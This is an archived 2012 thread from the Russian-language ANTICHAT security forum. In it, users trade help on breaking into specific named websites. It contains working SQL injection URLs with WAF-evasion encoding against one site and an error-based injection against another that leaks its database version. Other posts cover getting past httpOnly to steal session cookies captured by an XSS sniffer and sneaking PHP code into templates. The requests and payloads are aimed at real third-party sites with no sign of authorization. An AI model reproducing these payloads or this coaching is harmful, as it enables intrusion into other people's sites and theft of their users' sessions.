ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

16.07.2012, 20:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
3
|
|
Сообщение от aydin-ka
aydin-ka said:
Не могу обойти WAF...
-
OK
но не выводит
-
403
-
OK
но не выводит
Вопрос: как обойти?
http://www.tpsftz.org/page.php?programmes&cat=5&subcat=1'+union%23%0asel ect+1,2,3,4,5,6,7,8,9,10,11,12,13--+f
там string, кавычку не убирай.
|
|
|
|

16.07.2012, 20:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 45774
Репутация:
26
|
|
2aydin-ka
Сообщение от None
http://www.tpsftz.org/page.php?cat=5&subcat=-107'+union(select+1,2,3,4,5,6,7,8,9,user(),11,12,1 3)+--+
|
|
|
|

16.07.2012, 20:48
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от jasp3r
jasp3r said:
в модуле блогов на phpbb нашел xss(пасивку), но почему-то кроме настроек чата и phpsession больше ничего на сниффер не приходит.
httpOnly запрещает чтение Cookie через JS.
|
|
|

16.07.2012, 20:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 9919
Репутация:
0
|
|
Сообщение от M_script
M_script said:
httpOnly запрещает чтение Cookie через JS.
Спасибо, а есть возможность обойти это?
|
|
|
|

16.07.2012, 20:54
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от HeBepHyCb
HeBepHyCb said:
Вот нашел я активную XSS-ку ...но меня не интересуют куки ....мне до корней сайта охота добраться, до базы и всего прочего.
XSS выполняется на стороне клиента. Выполнить код на сервере непосредственно через эту уязвимость нельзя.
|
|
|

16.07.2012, 20:59
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от jasp3r
jasp3r said:
Спасибо, а есть возможность обойти это?
1) Метод TRACE
2) Уязвимость веб-сервера
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053
3) Плагины браузера
http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html
|
|
|

16.07.2012, 21:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 9919
Репутация:
0
|
|
Сообщение от M_script
M_script said:
1) Метод TRACE
2) Уязвимость веб-сервера
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053
3) Плагины браузера
http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html
Буду пробовать.
Еще в этом phpbb нашел такую штуку, в настройках юзера, там где формат даты вручную можно вводить, ввожу "> - выдает ошибку mysql:
SQL ERROR [ mysql4 ]
Data too long for column 'user_dateformat' at row 1 [1406]
при этом дата на форуме выглядит теперь вот так
Можно ли раскрутить до уязвимости?
Стоит там еще ajax chat у них, файл install не удалили, но максимум что с его помощью можно сделать, это выкинуть всех из чата, может я что-то еще не попробовал? Подсобите
|
|
|
|

16.07.2012, 21:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от jasp3r
jasp3r said:
Буду пробовать.
Еще в этом phpbb нашел такую штуку, в настройках юзера, там где формат даты вручную можно вводить, ввожу "> - выдает ошибку mysql:
SQL ERROR [ mysql4 ]
Data too long for column 'user_dateformat' at row 1 [1406]
при этом дата на форуме выглядит теперь вот так

Можно ли раскрутить до уязвимости?
Еще в репутации, похоже нифига не фильтруется, но и вывода там видимо нет:
http://tonkiimir.ru/reputation.php?u=-1+UNION+SELECT+1
Стоит там еще ajax chat у них, файл install не удалили, но максимум что с его помощью можно сделать, это выкинуть всех из чата, может я что-то еще не попробовал? Подсобите
Код:
Code:
http://tonkiimir.ru/reputation.php?u=3+or(1)group+by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))--+
Duplicate entry ' 5.1.58-1ubuntu1-log' for key 'group_key' [1062]
|
|
|
|

16.07.2012, 22:56
|
|
Новичок
Регистрация: 12.07.2008
Сообщений: 0
Провел на форуме: 4312
Репутация:
0
|
|
Сообщение от M_script
M_script said:
XSS выполняется на стороне клиента. Выполнить код на сервере непосредственно через эту уязвимость нельзя.
Ок, тогда не подскажете, как обойти фильтрацию такого рода:
Пишу сохраняется как
Если пишу <? phpinfo() ?> то сохраняется в исходном коде точно так же, а выводится на странице нормально т.е. , но не исполняется (( Как же тогда его туды вставить ?
|
|
|

17.07.2012, 00:32
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме: 11937
Репутация:
0
|
|
1. Выключена обработка РНР в файлах где Вы пытаетесь его вставить.
2. short_open_tag = off
3. Попробуйте варианты {php}{/php}, ну и тому подобные, в некоторых шаблонах проходят такие варианты кода! Да и убедитесь, что тот кусок куда Вы вставляете код, не выводится системой через echo... Боюсь потому у вас и идет вывод на страницу кода РНР!
P.S. Вариантов куда больше, думайте не много и сами...
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|